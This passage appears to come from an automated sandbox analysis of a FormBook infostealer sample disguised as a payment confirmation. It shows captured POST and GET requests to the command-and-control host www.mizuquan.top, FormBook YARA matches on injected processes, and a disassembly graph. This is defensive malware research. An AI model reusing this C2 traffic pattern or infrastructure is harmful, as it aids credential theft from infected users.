0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                        Sep 11, 2024 10:11:25.268136024 CEST691INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Wed, 11 Sep 2024 08:11:24 GMT
                                        Content-Type: text/html
                                        Content-Length: 548
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        35192.168.2.224919643.242.202.169801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:11:26.631670952 CEST723OUTPOST /ed2j/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.mizuquan.top
                                        Origin: http://www.mizuquan.top
                                        Referer: http://www.mizuquan.top/ed2j/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 202
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 4b 6c 77 76 31 45 45 4e 6d 63 63 50 79 4b 38 5a 50 68 79 6a 4f 59 38 70 66 76 53 79 4c 44 55 44 63 4d 6e 2f 51 5a 64 54 36 5a 74 2f 51 47 52 2b 66 46 43 62 52 41 37 57 75 46 61 4f 77 52 2b 35 62 66 54 4a 72 44 37 50 68 32 54 62 34 6e 43 4d 79 7a 58 7a 59 75 71 4e 6b 37 77 42 30 43 7a 52 75 55 65 38 58 30 4d 59 54 66 67 2f 69 66 6c 4c 6e 64 57 6c 37 42 46 5a 42 32 52 45 53 48 79 2f 63 79 48 7a 57 36 43 62 37 6a 6c 79 53 47 74 65 58 35 4d 75 41 74 54 54 30 78 58 6e 6f 33 44 36 68 69 73 54 38 59 6f 69 68 50 6a 74 2b 66 5a 2f 75 72 41 73 6f 59 42 75 6c 64 7a 76 72 4b 6d 33 6a 77 3d 3d
                                        Data Ascii: OlTXe=Klwv1EENmccPyK8ZPhyjOY8pfvSyLDUDcMn/QZdT6Zt/QGR+fFCbRA7WuFaOwR+5bfTJrD7Ph2Tb4nCMyzXzYuqNk7wB0CzRuUe8X0MYTfg/iflLndWl7BFZB2RESHy/cyHzW6Cb7jlySGteX5MuAtTT0xXno3D6hisT8YoihPjt+fZ/urAsoYBuldzvrKm3jw==
                                        Sep 11, 2024 10:11:27.485145092 CEST691INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Wed, 11 Sep 2024 08:11:27 GMT
                                        Content-Type: text/html
                                        Content-Length: 548
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        36192.168.2.224919743.242.202.169801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:11:29.170734882 CEST2472OUTPOST /ed2j/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.mizuquan.top
                                        Origin: http://www.mizuquan.top
                                        Referer: http://www.mizuquan.top/ed2j/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 3626
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 4b 6c 77 76 31 45 45 4e 6d 63 63 50 79 71 4d 5a 66 32 4f 6a 4a 34 38 32 42 2f 53 79 42 6a 55 35 63 4d 72 2f 51 62 77 49 35 76 56 2f 54 55 70 2b 65 6a 2b 62 54 41 37 57 6f 46 62 48 74 42 2f 36 62 62 37 7a 72 43 4c 35 68 30 2f 62 71 32 53 4d 6a 52 76 77 41 4f 71 4c 75 62 77 47 30 43 7a 2b 75 55 75 34 58 30 49 79 54 62 4d 2f 69 74 64 4c 77 64 58 7a 6c 78 46 5a 42 32 52 59 53 48 7a 63 63 79 76 52 57 2b 75 4c 36 51 74 79 52 6d 4e 65 55 65 34 74 49 4e 54 58 31 78 58 70 70 43 6d 32 35 53 59 2b 77 34 6f 54 67 4e 37 2b 79 39 4a 46 6a 37 41 62 6f 71 74 39 73 70 69 6e 70 62 54 45 38 75 4a 39 35 64 36 37 35 42 71 71 6d 6f 44 71 31 2b 5a 59 34 59 36 56 7a 79 6f 49 50 73 6f 4f 43 75 61 63 46 77 4d 4f 31 78 64 6e 47 47 4c 2f 32 6e 50 6c 4c 49 63 6d 74 71 76 44 34 74 66 51 46 55 57 42 65 56 32 2b 55 42 5a 46 4a 6f 70 2b 73 7a 39 54 44 56 4d 2f 79 31 77 44 32 56 30 6c 39 57 6c 35 43 38 63 6e 6f 49 46 2f 49 4b 4f 58 69 79 56 30 38 35 38 71 54 43 41 67 5a 6d 4f 2f 46 42 36 36 30 4b 38 72 4a 32 64 34 [TRUNCATED]
                                        Data Ascii: OlTXe=Klwv1EENmccPyqMZf2OjJ482B/SyBjU5cMr/QbwI5vV/TUp+ej+bTA7WoFbHtB/6bb7zrCL5h0/bq2SMjRvwAOqLubwG0Cz+uUu4X0IyTbM/itdLwdXzlxFZB2RYSHzccyvRW+uL6QtyRmNeUe4tINTX1xXppCm25SY+w4oTgN7+y9JFj7Aboqt9spinpbTE8uJ95d675BqqmoDq1+ZY4Y6VzyoIPsoOCuacFwMO1xdnGGL/2nPlLIcmtqvD4tfQFUWBeV2+UBZFJop+sz9TDVM/y1wD2V0l9Wl5C8cnoIF/IKOXiyV0858qTCAgZmO/FB660K8rJ2d4vF+SWNV25XTWCL3dhuFsQceNPfYXFouS409Z5SP0f6jx2euTQ01sRNS1e5FnXoD8sX2bBPsqYzO4Xmykap6jxX6wM0vUGyv/ZMpZwc5XmoKnkHjADxveCOni3FBlhbSqbERARFD1do33ZBj5VN3r2yRSLSoeuggOKhi8T2pyyXwkg7JRPVywoTz3Hy1Xag/AdQ7CfKoFmVF4UTMSibltHtEpmnH/4uK8CYQravRuIRj4UkiHJD6bloSv3xe7c9kYxPQpvAl2ZRA3/5k8QC/Th0tQD6GiLfGL2a5CzNZdhYOi3Fw0j7fVIIIOnyugClv8aZvW40Rd49LnkT6s8hwC9WoG+snPPL8nf8xWaYgp61zOL9h7x1Id3xeLGAFO9RnbIN1td1rWpzfrbtCdDtEY1LquPTAFQh7yLqaOQ44zKBqjrwCuWMKUqc2QKbEBKrXcdErZ0Y3XcjaD5LVz8oSeWGC/nEXVtAoC1+SpNFkmursbBUayQC5PqXROEeRfXPKgXd46ID8H6iISwbcunRjNMzu/JTuxeT9qFRQyWe5xrwwQ7mxa6E4943y45N5v9i831FMvmVEkOjoQoROZQxtSMOjkWo/aw8rFcKOuMLRQuYjpuYQt4UVJwquNgBVqYdeUuNoReI8r5w/V8v3qZ+CawchmictSDuOFc0 [TRUNCATED]
                                        Sep 11, 2024 10:11:29.175673008 CEST1676OUTData Raw: 4b 31 4c 4a 38 46 33 69 5a 67 55 71 33 6c 4e 74 79 6e 4a 6e 74 5a 41 78 76 70 6e 74 47 57 76 75 6e 54 48 32 43 37 32 4d 56 65 55 58 75 49 39 5a 63 50 34 36 73 38 30 41 48 61 49 55 2b 75 65 6c 55 4d 54 33 70 44 70 77 48 44 79 4b 7a 66 30 50 4e 79
                                        Data Ascii: K1LJ8F3iZgUq3lNtynJntZAxvpntGWvunTH2C72MVeUXuI9ZcP46s80AHaIU+uelUMT3pDpwHDyKzf0PNynDCMqAgedadPrpzCkwzdeUb8WZxfVFfqGWXsurvnGLwotCy4io6cnwnMWlVirkFuTSyiWUJP7pDA94p5iHwG0m/yGCBgXmfmGGsn4tXcOz7jGb9vto55ZkGaI6WikooYlAH/KoljBGgdFl89461YYy6W5usl28HlV
                                        Sep 11, 2024 10:11:30.034816027 CEST691INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Wed, 11 Sep 2024 08:11:29 GMT
                                        Content-Type: text/html
                                        Content-Length: 548
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        37192.168.2.224919843.242.202.169801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:11:31.716268063 CEST456OUTGET /ed2j/?OlTXe=HnYP2yoU4dt40olvIGC5RoskYevTXTgkbcmGMLslyKV8dFp2SGuaPRuUt3ufihjdd5fzvgaawU7CuzqToCbPCdeTlZwsuBv/uVCwYl9sd7doy+RVtoqpun8fEj8V&th=XXRlJ2 HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.mizuquan.top
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Sep 11, 2024 10:11:32.596515894 CEST691INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Wed, 11 Sep 2024 08:11:32 GMT
                                        Content-Type: text/html
                                        Content-Length: 548
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:04:08:29
                                        Start date:11/09/2024
                                        Path:C:\Users\user\Desktop\Payment confirmation 20240911.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\Payment confirmation 20240911.exe"
                                        Imagebase:0x12e0000
                                        File size:1'211'392 bytes
                                        MD5 hash:FCE0847BE56787ED350B9AA76990D91D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:2
                                        Start time:04:08:30
                                        Start date:11/09/2024
                                        Path:C:\Windows\SysWOW64\svchost.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\Payment confirmation 20240911.exe"
                                        Imagebase:0x1f0000
                                        File size:20'992 bytes
                                        MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.386010513.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.386010513.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.386042260.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.386042260.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.387128807.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.387128807.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:3
                                        Start time:04:08:40
                                        Start date:11/09/2024
                                        Path:C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe"
                                        Imagebase:0xf70000
                                        File size:140'800 bytes
                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.745450083.00000000003E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.745450083.00000000003E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.745725908.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.745725908.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:4
                                        Start time:04:08:41
                                        Start date:11/09/2024
                                        Path:C:\Windows\SysWOW64\RMActivate_ssp.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\SysWOW64\RMActivate_ssp.exe"
                                        Imagebase:0x30000
                                        File size:510'976 bytes
                                        MD5 hash:08D323750350A8A29611D1004C0CF319
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.745318015.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.745318015.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.745339267.0000000000280000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.745339267.0000000000280000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.745411785.0000000000310000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.745411785.0000000000310000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        Reputation:low
                                        Has exited:false

                                        General

                                        Target ID:7
                                        Start time:04:09:13
                                        Start date:11/09/2024
                                        Path:C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
                                        Imagebase:0xd00000
                                        File size:517'064 bytes
                                        MD5 hash:C2D924CE9EA2EE3E7B7E6A7C476619CA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.453167373.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.453167373.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:moderate
                                        Has exited:true

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:3%
                                          Dynamic/Decrypted Code Coverage:1.1%
                                          Signature Coverage:4.6%
                                          Total number of Nodes:1619
                                          Total number of Limit Nodes:165
                                          execution_graph 108073 1306a80 108074 1306a8c _raise 108073->108074 108110 1308b7b GetStartupInfoW 108074->108110 108076 1306a91 108112 130a937 GetProcessHeap 108076->108112 108078 1306ae9 108079 1306af4 108078->108079 108194 1306bd0 47 API calls 3 library calls 108078->108194 108113 13087d7 108079->108113 108082 1306afa 108083 1306b05 __RTC_Initialize 108082->108083 108195 1306bd0 47 API calls 3 library calls 108082->108195 108134 130ba66 108083->108134 108086 1306b14 108087 1306b20 GetCommandLineW 108086->108087 108196 1306bd0 47 API calls 3 library calls 108086->108196 108153 1313c2d GetEnvironmentStringsW 108087->108153 108090 1306b1f 108090->108087 108093 1306b3a 108094 1306b45 108093->108094 108197 1301d7b 47 API calls 3 library calls 108093->108197 108163 1313a64 108094->108163 108097 1306b4b 108098 1306b56 108097->108098 108198 1301d7b 47 API calls 3 library calls 108097->108198 108177 1301db5 108098->108177 108101 1306b5e 108103 1306b69 __wwincmdln 108101->108103 108199 1301d7b 47 API calls 3 library calls 108101->108199 108181 12e3682 108103->108181 108105 1306b7d 108106 1306b8c 108105->108106 108200 1302011 47 API calls _doexit 108105->108200 108201 1301da6 47 API calls _doexit 108106->108201 108109 1306b91 _raise 108111 1308b91 108110->108111 108111->108076 108112->108078 108206 1301e5a 30 API calls 2 library calls 108113->108206 108115 13087dc 108202 1308ab3 108115->108202 108118 13087e5 108207 130884d 50 API calls 2 library calls 108118->108207 108121 13087ea 108121->108082 108122 13087f7 108122->108118 108123 1308802 108122->108123 108209 1307616 108123->108209 108126 1308844 108217 130884d 50 API calls 2 library calls 108126->108217 108129 1308849 108129->108082 108130 1308823 108130->108126 108131 1308829 108130->108131 108216 1308724 47 API calls 4 library calls 108131->108216 108133 1308831 GetCurrentThreadId 108133->108082 108135 130ba72 _raise 108134->108135 108226 1308984 108135->108226 108137 130ba79 108138 1307616 __calloc_crt 47 API calls 108137->108138 108139 130ba8a 108138->108139 108140 130baf5 GetStartupInfoW 108139->108140 108143 130ba95 _raise @_EH4_CallFilterFunc@8 108139->108143 108148 130bc33 108140->108148 108149 130bb0a 108140->108149 108141 130bcf7 108233 130bd0b LeaveCriticalSection _doexit 108141->108233 108143->108086 108144 130bc7c GetStdHandle 108144->108148 108145 1307616 __calloc_crt 47 API calls 108145->108149 108146 130bc8e GetFileType 108146->108148 108147 130bb58 108147->108148 108151 130bb98 InitializeCriticalSectionAndSpinCount 108147->108151 108152 130bb8a GetFileType 108147->108152 108148->108141 108148->108144 108148->108146 108150 130bcbb InitializeCriticalSectionAndSpinCount 108148->108150 108149->108145 108149->108147 108149->108148 108150->108148 108151->108147 108152->108147 108152->108151 108154 1306b30 108153->108154 108155 1313c3e 108153->108155 108159 131382b GetModuleFileNameW 108154->108159 108156 1307660 __malloc_crt 47 API calls 108155->108156 108157 1313c64 _memmove 108156->108157 108158 1313c7a FreeEnvironmentStringsW 108157->108158 108158->108154 108160 131385f _wparse_cmdline 108159->108160 108161 1307660 __malloc_crt 47 API calls 108160->108161 108162 131389f _wparse_cmdline 108160->108162 108161->108162 108162->108093 108164 1313a7d __wsetenvp 108163->108164 108168 1313a75 108163->108168 108165 1307616 __calloc_crt 47 API calls 108164->108165 108173 1313aa6 __wsetenvp 108165->108173 108166 1313afd 108167 13028ca _free 47 API calls 108166->108167 108167->108168 108168->108097 108169 1307616 __calloc_crt 47 API calls 108169->108173 108170 1313b22 108171 13028ca _free 47 API calls 108170->108171 108171->108168 108173->108166 108173->108168 108173->108169 108173->108170 108174 1313b39 108173->108174 108296 1313317 47 API calls 2 library calls 108173->108296 108297 1307ab0 IsProcessorFeaturePresent 108174->108297 108176 1313b45 108176->108097 108178 1301dc1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 108177->108178 108180 1301e00 __IsNonwritableInCurrentImage 108178->108180 108320 1301b2a 52 API calls __cinit 108178->108320 108180->108101 108182 13523b5 108181->108182 108183 12e369c 108181->108183 108184 12e36d6 IsThemeActive 108183->108184 108321 1302025 108184->108321 108188 12e3702 108333 12e32de SystemParametersInfoW SystemParametersInfoW 108188->108333 108190 12e370e 108334 12e374e GetCurrentDirectoryW 108190->108334 108193 12e373b 108193->108105 108194->108079 108195->108083 108196->108090 108200->108106 108201->108109 108203 1308abf 108202->108203 108204 1308ac5 InitializeCriticalSectionAndSpinCount 108203->108204 108205 13087e1 108203->108205 108204->108203 108205->108118 108208 1308afd TlsAlloc 108205->108208 108206->108115 108207->108121 108208->108122 108211 130761d 108209->108211 108212 130765a 108211->108212 108213 130763b Sleep 108211->108213 108218 1313e5a 108211->108218 108212->108126 108215 1308b59 TlsSetValue 108212->108215 108214 1307652 108213->108214 108214->108211 108214->108212 108215->108130 108216->108133 108217->108129 108219 1313e65 108218->108219 108223 1313e80 